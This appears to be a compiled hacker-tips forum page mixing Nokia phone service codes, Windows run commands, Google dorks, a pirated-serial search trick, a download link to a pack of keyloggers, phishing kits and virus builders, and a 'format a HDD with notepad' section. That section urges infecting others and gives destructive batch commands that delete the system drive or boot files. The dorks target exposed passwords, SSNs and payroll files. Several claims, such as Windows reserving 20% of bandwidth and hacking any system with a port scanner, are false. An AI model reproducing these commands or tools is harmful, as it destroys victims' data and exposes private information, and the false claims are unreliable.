#pw+1234567890+4# for SimCard-Lock status

(master code) is a 10 digit code, based on the phones IMEI number.

update:
I get report that told me the code didn t works for Optimus Card
---------------------------------------------------------
Enhanced Full Rate Codec (EFR)
Enhanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (AlgebraicCode Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more)

*3370# and EFR will be activated after a reboot of the phone ( consumes more power )

#3370#
and EFR will be switched off after a reboot of the phone.
---------------------------------------------------------

Half Rate Codec (HR)
Half Rate will give you bad sound quality, which gives the service provider the opportunity to have more calls on the network; and you might get a lower charge from them. (Will give you 30% longer talk-time)
*4720# Half Rate coded will be activated after a reboot of the phone ( better standby time )

#4720# Half Rate coded will be de-activated after a reboot of the phone
---------------------------------------------------------

Unblocking Code
Unblock PIN1 : **05*PUK*newPIN1*newPIN1#@
UnBlock PIN2 : **052*PUK2*newPIN2*newPIN2#@
---------------------------------------------------------

Hiding your phone number
Dial 141 then the number you want to call eg. 141#######
This should stop your number been sent to the caller. (*)
(*) This only works on UK phones, if anybody has tried this and works, please let me know.
---------------------------------------------------------

Unlocking PIN2 for software version
V 05.07
20.11.98
NSE-1

If your SimCard is locked by your SP, you can check it and if it is, you will get the "wrong code" message on the display (for use 1234567890)
If your SimCard is locked by your SP, you can t unlock PIN2 !
---------------------------------------------------------

Blocking phone number at Cantel AT&T

If you have one of those cantel at&t phones if you press #0000# you can block your number
at no extra charge.
---------------------------------------------------------

New Menu on Emergency Calls *3001#12345#

Brings a new menu that gives you access to the emergency calls ( 911 Etc. ). It will give you FREE calls! (only the ones you put in the emergency!! )

This option will depend on your GSM operator
---------------------------------------------------------

Your number in your display
Goto menu 3-7 Call cost settings.
Turn ON the Call costs limit 3-7-1. PIN2 code Required.
Put in the limit with the phone number.
eg. my phone # is 019 2184697
Enter the limit as 2184697
Goto menu 3-7-2 Show costs in. PIN2 code Required.
Select Currency.
Enter Unit price : 1
Enter Currency name as 019 (per my phone # eg. above)
Now the phone number 019 2184697 will remains on the 4th row of the display.
Secondly, if you press the # key, it prompt which line to be used; Line 1 or 2.
---------------------------------------------------------
Free Call Tip

The tips needs Net Monitor enabled. Be aware that the trick will remove Netmonitor in some sw versions like v4.73 and v5.04.
Launch the Net Monitor in your Nokia 51xx / 61xx
Execute the test number 497
Free calling for about 90 sec should now have been activated.
---------------------------------------------------------

Nokia 5110 PIN-Out

Pin-Outs: Bottom view, keyboard up, counting from the left

V V 1 2 3 4 5 6 V
(o) | | [= = = = = =] | |
7 8 9 10 11 12

1 - VIN CHARGER INPUT VOLTAGE 8.4V 0.8A
2 - CHRG CTRL CHARGER CONTROL PWM 32Khz
3 - XMIC MIC INPUT 60mV - 1V
4 - SGND SIGNAL GROUND
5 - XEAR EAR OUTPUT 80mV - 1V
6 - MBUS 9600 B/S
7 - FBUS_RX 9.6 - 230.4 KB/S
8 - FBUS_TX 9.6 - 230.4 KB/S
9 - L_GND CHARGER / LOGIC GND

Nokia 61xx
__________

Firmware version
*#0000# or *#61x0#
IMEI Code
* # 06 #
Warranty Codes
*#92702689# (= *#war0anty#)

Just scroll down through the information. If entering the above code requires a
further warranty code try entering the following:

6232 (OK) : Month and year of manufacture
7332 (OK) : Last repair date
7832 (OK) : Purchase date (if previously set)
9268 (OK) : Serial number
37832 (OK) : Set purchase date (this can only be done once)
87267 (OK) : Confirm transfer

Enhanced Full Rate (EFR) and Half Rate Mode (HFR)

*3370# to activate Enhanced Full Rate - Makes calls sound better, but
decreases the battery life by about 5%.(I recommend this one)
#3370# to deactivate Enhanced Full Rate
*4720# to activate Half Rate Mode - Drops call quality, but increases battery
life by about 30%.
#4720# to deactivate Half Rate Mode

Nokia 81xx
_____________

Show IMEI code
* # 06 #
Software Version
* # 8110 #
This code shows you software version, date of manufacture and hardware number of your phone.

Warranty Codes
*#92702689# (= *#war0anty#)

Just scroll down through the information. If entering the above code requires a
further warranty code try entering the following:

6232 (OK) : Month and year of manufacture
7332 (OK) : Last repair date
7832 (OK) : Purchase date (if previously set)
9268 (OK) : Serial number
37832 (OK) : Set purchase date (this can only be done once)
87267 (OK) : Confirm transfer

Sim Clock information

To check if the Sim-Clock can be stopped type: *#746025625# (= *#sim0clock#)

Nokia 8810
____________
Firmware version
*#0000# or *#8810#
IMEI Code
* # 06 #
Warranty Codes
*#92702689# (= *#war0anty#)

Just scroll down through the information. If entering the above code requires a
further warranty code try entering the following:

6232 (OK) : Month and year of manufacture
7332 (OK) : Last repair date
7832 (OK) : Purchase date (if previously set)
9268 (OK) : Serial number
37832 (OK) : Set purchase date (this can only be done once)
87267 (OK) : Confirm transfer

Enhanced Full Rate (EFR) and Half Rate Mode (HFR)

*3370# to activate Enhanced Full Rate - Makes calls sound better, but
decreases the battery life by about 5%.(I recommend this one)
#3370# to deactivate Enhanced Full Rate
*4720# to activate Half Rate Mode - Drops call quality, but increases battery
life by about 30%.
#4720# to deactivate Half Rate Mode

How to improve your internat speed...?

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc. Don't you want to get it back for your self? Here is the trick how to get 100% of your available bandwidth.
Increase internet speed :ugeek:

To get it back:
Click Start then Run and type "gpedit.msc" without quotes.

This opens the "group policy editor" and go to: "Local Computer Policy"

Then "Computer Configuration" Then "Administrative Templates"

Then select "Network" then "QOS Packet Scheduler"

After that select "Limit Reservable Bandwidth".
Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e." By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20

Google search hackingThis is a featured page

Well if u ask me this is the best Part " how to Search ",Anyone anywhere needs something out of the great "www", now if u know how to grab hold to "something" in one click that is the skill, this article henceforth is one of my best my best, n especially crafted to meet all your needs !!

Google Operators:

Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weapons
Basic Operators:

+, -, ~ , ., *, “”, |,

OR

Advanced Operators:

allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange

Basic Operators !!



(+) force inclusion of something common

Google ignores common words (where, how, digit, single letters) by default:
Example: StarStar Wars Episode +I

(-) exclude a search term
Example: apple –red

(“) use quotes around a search term to search exact phrases:
Example: “Robert Masse”

Robert masse without “” has the 309,000 results, but “robert masse” only has 927 results. Reduce the 99% irrelevant results

Basic Operators

(~) search synonym:
Example: ~food
Return the results about food as well as recipe, nutrition and cooking information


( . ) a single-character wildcard:
Example: m.trix


Return the results of M@trix, matrix, metrix…….
( * ) any word wildcard

Advanced Operators: “Site:”


Site: Domain_name
Find Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domain


Find documents with specified extensions

The supported extensions are:

- HyperText Markup Language (html) - Microsoft PowerPoint (ppt)
- Adobe Portable Document Format (pdf) - Microsoft Word (doc)
- Adobe PostScript (ps) - Microsoft Works (wks, wps, wdb)
- Lotus 1-2-3 - Microsoft Excel (xls)
(wk1, wk2, wk3, wk4, wk5, wki, wks, wku) - Microsoft Write (wri)
- Lotus WordPro (lwp) - Rich Text Format (rtf)
- MacWrite (mw) - Shockwave Flash (swf)
- Text (ans, txt)


Note: We actually can search asp, php and cgi, pl files as long as it is text-compatible.

Example: Budget filetype: xls

Advanced Operators “Intitle:”


Intitle: search_term

Find search term within the title of a Webpage

Allintitle: search_term1 search_term2 search_term3
Find multiple search terms in the Web pages with the title that includes all these words

These operators are specifically useful to find the directory lists


Example:
Find directory list:
Intitle: Index.of “parent directory”

Advanced Operators “Inurl:”



Inurl: search_term
Find search term in a Web address

Allinurl: search_term1 search_term2 search_term3
Find multiple search terms in a Web address


Examples:
Inurl: cgi-bin
Allinurl: cgi-bin password

Advanced Operators “Intext;”



Intext: search_term
Find search term in the text body of a document.

Allintext: search_term1 search_term2 search_term3
Find multiple search terms in the text body of a document.


Examples:
Intext: Administrator login
Allintext: Administrator login

Advanced Operators: “Cache:”


Cache: URL
Find the old version of Website in Google cache

Sometimes, even the site has already been updated, the old information might be found in cache


Advanced Operatorst


..
Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents


Examples:
Computer $500..1000
DVD player $250..350

Advanced Operators: “Daterange:”


Daterange: -

Find the Web pages between start date and end date

Note: start_date and end date use the Julian date
The Julian date is calculated by the number of days since January 1, 4713 BC. For example, the Julian date for August 1, 2001 is 2452122


Examples:
2004.07.10=2453196
2004.08.10=2453258


Vulnerabilities date range: 2453196-2453258

Advanced Operators “Link:”


Link: URL
Find the Web pages having a link to the specified URL

Related: URL
Find the Web pages that are “similar” to the specified Web page
info: URL

Present some information that Google has about that Web page
Define: search_term

Provide a definition of the words gathered from various online sources


Define: Network security

Advanced Operators “phonebook:”


Phonebook
Search the entire Google phonebook
rphonebook
Search residential listings only
bphonebook
Search business listings only


Examples:
Phonebook: robert las vegas (robert in Las Vegas)
Phonebook: (702) 944-2001 (reverse search, not always work)
The phonebook is quite limited to U.S.A

But the Question rises What can Google can do for an Ethical Hacker?

Search sensitive information like payroll, SIN, even the personal email box

Vulnerabilities scanner

Transparent proxy

So how but if i tell u a different way to search
k lets do this type in the following statements n c d results
we can only provide u the guidelines, now u need to implement your Creativity to Keep it rolling.

Salary

Salary filetype: xls site: edu

Security social insurance number


Intitle: Payroll intext: ssn filetype: xls site: edu

Security Social Insurance Number

Payroll intext: Employee intext: ssn Filetype: xls


Filetype: xls “checking account” “credit card” - intext: Application -intext:
Form (only 39 results)

Financial Information


Intitle: “Index of” finances.xls (9)

Personal Mailbox


Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)

Confidential Files

“not for distribution” confidential (1,760)
Confidential Files
“not for distribution” confidential filetype: pdf (marketing info) (456)

OS Detection

Use the keywords of the default installation page of a Web server to search.

Use the title to search

Use the footer in a directory index page



OS Detection-Windows
“Microsoft-IIS/5.0 server at”


OS Detection - Windows
Default web page?
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0



OS Detection –Apache 1.3.11-1.3.26
Intitle: Test.Page.for.Apache seeing.this.instead


OS Detection-Apache SSL enable
Intitle: Test.page “SSL/TLS-aware” (127)

Search Passwords


Search the well known password filenames in URL
Search the database connection files or configuration files to find a password and username
Search specific username file for a specific product

Search Passwords


Inurl: etc inurl: passwd

Search Passwords


Intitle: “Index of..etc” passwd

Search Passwords


Intitle: “Index of..etc” passwd

Search Passwords


Inurl: admin.pwd filetype: pwd

Search Passwords
Filetype: inc dbconn

Search Passwords


Filetype: inc intext: mysql_connect

Search Passwords


Filetype: ini +ws_ftp +pwd (get the encrypted passwords)

Search Passwords


Filetype: log inurl: “password.log”


Search Username
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”


License Key
Filetype: lic lic intext: key (33) (license key)


Sensitive Directories Listing
Powerful buzz word: Index of
Search the well known vulnerable directories names



Sensitive Directories Listing
“index of cgi-bin” (3590)



Sensitive Directories Listing
Intitle: “Index of” cfide (coldfusion directory)


Sensitive Directories Listing
Intitle: index.of.winnt

Get the serial number you need ! (For Certain Things)

1) Go to Google.

2) Use Keyword as "Product name" 94FBR

3) Where, "Product Name" is the name of the item you want to find the serial number for.

4) And voila - there you go - the serial number you needed.

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

See these example searches:
Code:

"Photoshop 7"+94FBR
"Age of Mythology"+94FBR
"Nero Burning Rom 5.5"+94FBR

Hacking AIO 2007-2008

=====================================
-DESCRIPTION-
=====================================
This is a little pack created for
educational purposes only.
It contains the Following Porgrams.
-------------------------------------
Keyloggers
-------------------------------------
-Dark Keylogger
-Elite Keylogger 3.0
-tiny keylogger 1.0
-------------------------------------
Phishing
-------------------------------------
-AOL - AIM
-EverQuest Forum
-Gmail
-MySpace
-PhotoBucket
-Runescape
-Yahoo
-DailyMotion
-FaceBook
-Habbo
-RapidShare
-Skype
-YouTube
-eBay
-FileFront
-Hi5
-PayPal
-Ripway
-VanGuard
-------------------------------------
Rapidshare
-------------------------------------
-Premium Downloads Tutorial
-------------------------------------
Brute Force
-------------------------------------
-BruteForceMD5
-http_brute_forcer_1.0
-phpftpbrute_1.0
-Brutus
-john-16
-ftp_brute_hacker_0.1
-L0phtCrack 2.52
-MD5 Toolbox 1.0.exe
-------------------------------------
DDos
-------------------------------------
-bitchslap_1.0
-donut_http_flooder_1.4
-click_2.2
-crazyping_1.1
-Hartz4Flooder_v0.2..exe
-------------------------------------
Construction Kits
-------------------------------------
-batch_o_matic_7.6
-BioHazard
-Html Virus ConstructionKit 2.0
-batch_virus_construction_kit
-davs_delphi_w0rm_gen_1.0
-javascript_generator_1.1
-batch_virus_maker_2.0
-evil_tool_1.6
-------------------------------------
Root Kits
-------------------------------------
-RootKitRevealer
-Windows RootKit
-------------------------------------
Wlan
-------------------------------------
-aircrack-2.3
-aircrack-ng-0.6.2-win
-bsd_airtools


Download Link: http://rapidshare.com/files/86444713/Hacking_AIO_2007-2008.zip

Format a HDD with notepadThis is a featured page

Format a HDD with notepad



Step 1.

Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000

Step 2.

Save As An EXE Any Name Will Do

Step 3.

Send the EXE to People And Infect

OR


IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000


format a:\ /Q/X -- this will format your drive a:\



01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.



01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest

cant spoonfeed

its workin

Do not try it on ur PC. dont mess around this is for educational purpose only


still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat

worse


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

FASTEST WAY TO HACK INTO **** SYSTEM

u can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking.

steps: -

1.Download software PORT SCANNER.
2.Copy the ip address of the victim whose port is open.
3.Download NETLAB which gives u all information includes victim ip address,Area from where he is accessing internet....
4.Paste the ip of victim u found initially into NETLAB .Thats it u access his system.

NetLab 1.4 Free Download!!!


" SO THAT I CAN ADD MORE STUFF LIKE THIS ,PLEASE RATE ME AND GIVE REPLIES "

Dos Tricks and Shortcuts

Full Codes. Kindly Add if U know more !




Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
timedate.cpl
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (If Installed)*
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab Preselected)
control color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control folders
Fonts
control fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
IP Configuration (Display Connection Configuration)
ipconfig /all
IP Configuration (Display DNS Cache Contents)
ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)
ipconfig /flushdns
IP Configuration (Release All Connections)
ipconfig /release
IP Configuration (Renew All Connections)
ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)
ipconfig /registerdns
IP Configuration (Display DHCP Class ID)
ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)
ipconfig /setclassid
Java Control Panel (If Installed)
jpicpl32.cpl
Java Control Panel (If Installed)
javaws
Keyboard Properties
control keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Microsoft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control mouse
Mouse Properties
main.cpl
Network Connections
control netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Notepad
notepad
Nview Desktop Manager (If Installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (If Installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Remote Desktop
mstsc
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility (Scan Immediately)
sfc /scannow
System File Checker Utility (Scan Once At Next Boot)
sfc /scanonce
System File Checker Utility (Scan On Every Boot)
sfc /scanboot
System File Checker Utility (Return to Default Setting)
sfc /revert
System File Checker Utility (Purge File Cache)
sfc /purgecache
System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad
write
Run line commands can be very useful some times, its better to know them here are all the commands that i know u might find them usefull too Commands are same for Windows xp pro and home

Run Line Commands


These are GUI applications that can be opened from the run line.
These applications are not located in the C:\windows\system32\ directory, the
keys for these applications are located in the registry under:
HKLM\software\microsoft\windows\currentversion\app paths
BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
PBRUSH.EXE - Paint
PINBALL.EXE - Pinball
RVSEZM.EXE - Reversi
SHVLZM.EXE - Spades
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad

These .EXE files reside in (c:\windows\system32\) or (c:\windows\) directory.
ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DDESHARE.EXE - DDE Share
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DVDPLAY.EXE - DVD Player
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FREECELL.EXE - Free Cell
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSHEARTS.EXE - Hearts
MSPAINT.EXE - Paint
MSTSC.EXE - Remote Desktop Connection
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire

SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update

The following are Control Panel applets that can be run from the run line.
They are located in the c:\windows\system32 directory, and have the file type
extension ".CPL".
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened from
the run line. These applications have the file type extension ".MSC".
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure




Calculation on command Prompt ! u knew dis???


The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

For more information, type set /? at the command prompt.


***************************************************************************

Hey folks, do u know that windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.
Go to Starts-->Programs-->Run
Type
telnet towel.blinkenlights.nl
And hit enter......... Enjoy the magic!!!!